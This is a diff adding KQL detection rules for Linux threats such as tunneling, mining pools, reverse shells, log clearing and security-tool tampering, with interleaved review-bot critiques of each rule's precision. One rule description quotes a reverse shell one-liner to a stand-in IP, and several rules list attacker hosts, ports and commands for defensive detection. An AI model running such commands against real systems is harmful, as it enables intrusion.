+// - Legitimate use of the LocaltoNet service.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com"
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql
new file mode 100644
index 00000000..e3a2d96c
--- /dev/null
+++ b/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql
@@ -0,0 +1,12 @@
+// Title: Communication To Ngrok Tunneling Service - Linux
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-03
+// Level: high
+// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
+// False Positives:
+// - Legitimate use of ngrok
+
+DeviceNetworkEvents
+| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql b/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql
new file mode 100644
index 00000000..d12702fd
--- /dev/null
+++ b/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql
@@ -0,0 +1,12 @@
+// Title: Linux Crypto Mining Pool Connections
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects process connections to a Monero crypto mining pool
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+
+DeviceNetworkEvents
+| where RemoteUrl in~ ("pool.minexmr.com", "fr.minexmr.com", "de.minexmr.com", "sg.minexmr.com", "ca.minexmr.com", "us-west.minexmr.com", "pool.supportxmr.com", "mine.c3pool.com", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-asia1.nanopool.org", "xmr-jp1.nanopool.org", "xmr-au1.nanopool.org", "xmr.2miners.com", "xmr.hashcity.org", "xmr.f2pool.com", "xmrpool.eu", "pool.hashvault.pro", "moneroocean.stream", "monerocean.stream")
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql b/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql
new file mode 100644
index 00000000..d8967000
--- /dev/null
+++ b/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql
@@ -0,0 +1,10 @@
+// Title: Linux Reverse Shell Indicator
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-16
+// Level: critical
+// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "/bin/bash" and (not((RemoteIP in~ ("127.0.0.1", "0.0.0.0"))))
\ No newline at end of file
diff --git a/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql
new file mode 100644
index 00000000..b0f448d3
--- /dev/null
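Review bot: The loopback exclusion on the `where` line lists only `127.0.0.1` and `0.0.0.0`, so IPv6 loopback (`::1`) and the rest of `127.0.0.0/8` still raise a `critical` alert for any purely local bash-initiated connection. Use a range test instead: `not(ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or RemoteIP == "::1" or RemoteIP == "0.0.0.0")`. The rule has no `False Positives` block, unlike the sibling rules in this batch; a note that bash scripts legitimately open sockets (e.g. `/dev/tcp` health checks) would set expectations for a `critical`-level alert, and `contecting` in the description should be `connecting`.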
+++ b/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Malware Callback Communication - Linux
+// Author: hasselj
+// Date: 2024-05-10
+// Level: high
+// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("888", "999", "2200", "2222", "4000", "4444", "6789", "8531", "50501", "51820")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql b/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql
new file mode 100644
index 00000000..c8a07206
--- /dev/null
+++ b/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql
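Review bot: `RemotePort in~ ("888", ...)` on the `where` line applies the case-insensitive string operator to the integer `RemotePort` column; Kusto does not coerce across that type boundary, so the query is expected to fail at parse time rather than match anything. Use integer literals with the plain operator: `RemotePort in (888, 999, 2200, 2222, 4000, 4444, 6789, 8531, 50501, 51820)`. The private-range exclusion also feeds IPv6 prefixes (`::1/128`, `fe80::/10`, `fc00::/7`) to `ipv4_is_in_range`, which yields null for non-IPv4 input; a null inside the `not(...)` makes the whole predicate null and `where` drops the row, so as written every IPv6 destination — public ones included — is silently excluded instead of evaluated. Use `ipv6_is_in_range` for those three entries.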
@@ -0,0 +1,12 @@
+// Title: Access of Sudoers File Content
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /etc/sudoers" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/egrep" or FolderPath endswith "/emacs" or FolderPath endswith "/fgrep" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql b/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql
new file mode 100644
index 00000000..09580819
--- /dev/null
+++ b/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql
@@ -0,0 +1,14 @@
+// Title: Audit Rules Deleted Via Auditctl
+// Author: Mohamed LAKRI
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
+// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
+// Removal of audit rules can significantly impair detection of malicious activities on the affected system.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.012
+// False Positives:
+// - An administrator troubleshooting. Investigate all attempts.
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "-D" and FolderPath endswith "/auditctl"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/bash_interactive_shell.kql b/KQL/rules/linux/process_creation/bash_interactive_shell.kql
new file mode 100644
index 00000000..48f6a90f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/bash_interactive_shell.kql
@@ -0,0 +1,10 @@
+// Title: Bash Interactive Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: low
+// Description: Detects execution of the bash shell with the interactive flag "-i".
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -i " and FolderPath endswith "/bash"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql b/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql
new file mode 100644
index 00000000..c7b1deda
--- /dev/null
+++ b/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql
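Review bot: `ProcessCommandLine matches regex "-D"` on the `where` line is an unanchored substring match, so any auditctl invocation whose command line contains `-D` anywhere (for example inside a `-k` key name such as `pre-Deploy`) fires this `high`-level rule, and a plain `contains` would have done the same job more cheaply. Anchor the flag as a standalone token: `ProcessCommandLine matches regex @"(^|\s)-D(\s|$)"`. The description's "disable audit logging" intent also covers `auditctl -e 0`, which turns auditing off without deleting rules; that deserves either a second clause or a note that it is intentionally out of scope.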
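Review bot: `ProcessCommandLine contains " -i "` requires a space after the flag, so a command line that ends in `bash -i` (the usual shape when an interactive shell is the last stage of a reverse-shell one-liner) is not matched, and combined short options such as `-il` are missed as well. Use `ProcessCommandLine contains " -i " or ProcessCommandLine endswith " -i"`. The rule also lacks the `False Positives` block its siblings carry; interactive bash from terminals and SSH sessions is routine, so a sentence saying the rule is meant for correlation rather than alerting would help.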
@@ -0,0 +1,12 @@
+// Title: BPFtrace Unsafe Option Usage
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the usage of the unsafe bpftrace option
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+// - Legitimate usage of the unsafe option
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--unsafe" and FolderPath endswith "bpftrace"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
new file mode 100644
index 00000000..d661373c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql
@@ -0,0 +1,10 @@
+// Title: Capabilities Discovery - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: low
+// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r " and FolderPath endswith "/getcap"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql b/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql
new file mode 100644
index 00000000..9dff2a13
--- /dev/null
+++ b/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql
@@ -0,0 +1,10 @@
+// Title: Capsh Shell Invocation - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "capsh" utility to invoke a shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith " --" and FolderPath endswith "/capsh"
\ No newline at end of file
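Review bot: `ProcessCommandLine endswith " --"` only catches the bare `capsh --` form; the variant that hands a command to the spawned shell, `capsh -- -c "id"`, does not end in ` --` and is missed even though it is the more useful invocation for an attacker. Match the separator as a token instead: `ProcessCommandLine endswith " --" or ProcessCommandLine contains " -- "`. A `False Positives` block is also missing; every other rule in this batch has one, and a `high` level without it gives triage nothing to go on.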
diff --git a/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql b/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql
new file mode 100644
index 00000000..12946f6c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql
@@ -0,0 +1,12 @@
+// Title: Chmod Suspicious Directory
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects chmod targeting files in abnormal directory paths.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+// - Admin changing file permissions.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/.Library/" or ProcessCommandLine contains "/etc/" or ProcessCommandLine contains "/opt/") and FolderPath endswith "/chmod"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/clear_linux_logs.kql b/KQL/rules/linux/process_creation/clear_linux_logs.kql
new file mode 100644
index 00000000..b7eb3b14
--- /dev/null
+++ b/KQL/rules/linux/process_creation/clear_linux_logs.kql
@@ -0,0 +1,12 @@
+// Title: Clear Linux Logs
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/var/log" or ProcessCommandLine contains "/var/spool/mail") and (FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql b/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql
new file mode 100644
index 00000000..4d252f98
--- /dev/null
+++ b/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql
@@ -0,0 +1,13 @@
+// Title: Clipboard Collection with Xclip Tool
+// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
+// Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+// False Positives:
+// - Legitimate usage of xclip tools.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-sel" and ProcessCommandLine contains "clip" and ProcessCommandLine contains "-o") and FolderPath contains "xclip"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/connection_proxy.kql b/KQL/rules/linux/process_creation/connection_proxy.kql
new file mode 100644
index 00000000..2581351e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/connection_proxy.kql
@@ -0,0 +1,12 @@
+// Title: Connection Proxy
+// Author: Ömer Günal
+// Date: 2020-06-17
+// Level: low
+// Description: Detects setting proxy configuration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "http_proxy=" or ProcessCommandLine contains "https_proxy="
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql
new file mode 100644
index 00000000..450e7d9c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql
@@ -0,0 +1,13 @@
+// Title: Container Residence Discovery Via Proc Virtual FS
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where (FolderPath endswith "awk" or FolderPath endswith "/cat" or FolderPath endswith "grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nl" or FolderPath endswith "/tail") and (ProcessCommandLine contains "/proc/2/" or (ProcessCommandLine contains "/proc/" and (ProcessCommandLine endswith "/cgroup" or ProcessCommandLine endswith "/sched")))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql
new file mode 100644
index 00000000..8bd804dd
--- /dev/null
+++ b/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql
@@ -0,0 +1,10 @@
+// Title: Copy Passwd Or Shadow From TMP Path
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-31
+// Level: high
+// Description: Detects when the file "passwd" or "shadow" is copied from tmp path
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "passwd" or ProcessCommandLine contains "shadow") and FolderPath endswith "/cp" and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/crontab_enumeration.kql b/KQL/rules/linux/process_creation/crontab_enumeration.kql
new file mode 100644
index 00000000..a5d0476b
--- /dev/null
+++ b/KQL/rules/linux/process_creation/crontab_enumeration.kql
@@ -0,0 +1,12 @@
+// Title: Crontab Enumeration
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects usage of crontab to list the tasks of the user
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007
+// False Positives:
+// - Legitimate use of crontab
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -l" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/curl_usage_on_linux.kql b/KQL/rules/linux/process_creation/curl_usage_on_linux.kql
new file mode 100644
index 00000000..b8b7fd60
--- /dev/null
+++ b/KQL/rules/linux/process_creation/curl_usage_on_linux.kql
@@ -0,0 +1,13 @@
+// Title: Curl Usage on Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: low
+// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/dd_file_overwrite.kql b/KQL/rules/linux/process_creation/dd_file_overwrite.kql
new file mode 100644
index 00000000..7b496334
--- /dev/null
+++ b/KQL/rules/linux/process_creation/dd_file_overwrite.kql
@@ -0,0 +1,12 @@
+// Title: DD File Overwrite
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects potential overwriting and deletion of a file using DD.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+// False Positives:
+// - Any user deleting files that way.
+
+DeviceProcessEvents
+| where (FolderPath in~ ("/bin/dd", "/usr/bin/dd")) and ProcessCommandLine contains "of=" and (ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/null")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql b/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql
new file mode 100644
index 00000000..354f3cb0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql
@@ -0,0 +1,12 @@
+// Title: Decode Base64 Encoded Text
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-d" and FolderPath endswith "/base64"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/disable_or_stop_services.kql b/KQL/rules/linux/process_creation/disable_or_stop_services.kql
new file mode 100644
index 00000000..3cf1fbe5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/disable_or_stop_services.kql
@@ -0,0 +1,12 @@
+// Title: Disable Or Stop Services
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "stop" or ProcessCommandLine contains "disable") and (FolderPath endswith "/service" or FolderPath endswith "/systemctl" or FolderPath endswith "/chkconfig")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/disabling_security_tools.kql b/KQL/rules/linux/process_creation/disabling_security_tools.kql
new file mode 100644
index 00000000..debc1408
--- /dev/null
+++ b/KQL/rules/linux/process_creation/disabling_security_tools.kql
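Review bot: `ProcessCommandLine contains "-d"` in the Decode Base64 Encoded Text hunk matches the substring anywhere in the command line, so a base64 invocation whose file argument merely contains "-d" (a path such as /opt/foo-data/x) alerts without the decode flag, and because KQL `contains` is case-insensitive an uppercase `-D` matches as well. If a whole-argument match is the intent, a whitespace-anchored regex is closer to it: `(ProcessCommandLine matches regex @"\s-d(\s|$)" or ProcessCommandLine contains "--decode") and FolderPath endswith "/base64"`. The Sigma source most likely carries the same bare `-d` contains, so this may be an upstream precision issue rather than a converter defect, but the converter is where a project-wide policy for short flags would live.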
@@ -0,0 +1,12 @@
+// Title: Disabling Security Tools
+// Author: Ömer Günal, Alejandro Ortuno, oscd.community
+// Date: 2020-06-17
+// Level: medium
+// Description: Detects disabling security tools
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "off") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "stop" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "disable" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or (ProcessCommandLine contains "0" and FolderPath endswith "/setenforce")
\ No newline at end of file
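Review bot: The final disjunct in the Disabling Security Tools hunk, `(ProcessCommandLine contains "0" and FolderPath endswith "/setenforce")`, matches a zero anywhere in the command line rather than the mode argument, while the equivalent `setenforce Permissive` form is not covered at all. Anchoring on the argument keeps the intent and closes the gap: `((ProcessCommandLine endswith " 0" or ProcessCommandLine endswith " permissive") and FolderPath endswith "/setenforce")` — KQL `endswith` is case-insensitive, so the lowercase literal suffices. The `contains "stop"` / `contains "disable"` pairs earlier in the same line are similarly substring matches over the whole command line; that breadth is inherited from the Sigma source, and if it is kept it is worth a concrete `// False Positives:` line beyond "Legitimate administration activities".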
diff --git a/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql
new file mode 100644
index 00000000..e69d3819
--- /dev/null
+++ b/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql
@@ -0,0 +1,13 @@
+// Title: Docker Container Discovery Via Dockerenv Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith ".dockerenv" and (FolderPath endswith "/cat" or FolderPath endswith "/dir" or FolderPath endswith "/find" or FolderPath endswith "/ls" or FolderPath endswith "/stat" or FolderPath endswith "/test" or FolderPath endswith "grep")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql
new file mode 100644
index 00000000..e53e2981
--- /dev/null
+++ b/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql
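Review bot: In the Docker Container Discovery hunk the last image clause is `FolderPath endswith "grep"` without the leading slash every other clause carries, so it also matches /usr/bin/pgrep, zgrep and any binary whose name merely ends in "grep"; if egrep/fgrep coverage is the intent they should be listed explicitly, `FolderPath endswith "/grep" or FolderPath endswith "/egrep" or FolderPath endswith "/fgrep"`. `ProcessCommandLine endswith ".dockerenv"` only matches when the file name is the final token of the recorded command line, so invocations with further arguments are not covered; that is worth stating in a comment, or relaxing to `ProcessCommandLine contains ".dockerenv"` if the extra hits are acceptable at Level: low. The description's "sing" should read "sign"; as this line is converter output the typo presumably originates in the Sigma source and should be fixed there.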
@@ -0,0 +1,10 @@
+// Title: Download File To Potentially Suspicious Directory Via Wget
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content to a suspicious directory
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where FolderPath endswith "/wget" and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql b/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql
new file mode 100644
index 00000000..2c9d2428
--- /dev/null
+++ b/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql
@@ -0,0 +1,10 @@
+// Title: Enable BPF Kprobes Tracing
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-25
+// Level: medium
+// Description: Detects common command used to enable bpf kprobes tracing
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/myprobe/enable" or ProcessCommandLine contains "/myretprobe/enable") and (ProcessCommandLine contains "echo 1 >" and ProcessCommandLine contains "/sys/kernel/debug/tracing/events/kprobes/")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql
new file mode 100644
index 00000000..b85224c5
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Account Creation Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects user account creation on ESXi system via esxcli
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "system " and ProcessCommandLine contains "account " and ProcessCommandLine contains "add ") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql
new file mode 100644
index 00000000..4e3110fb
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Admin Permission Assigned To Account Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: high
+// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "system" and (ProcessCommandLine contains " permission " and ProcessCommandLine contains " set" and ProcessCommandLine contains "Admin") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql
new file mode 100644
index 00000000..69d9da04
--- /dev/null
+++ b/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Network Configuration Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
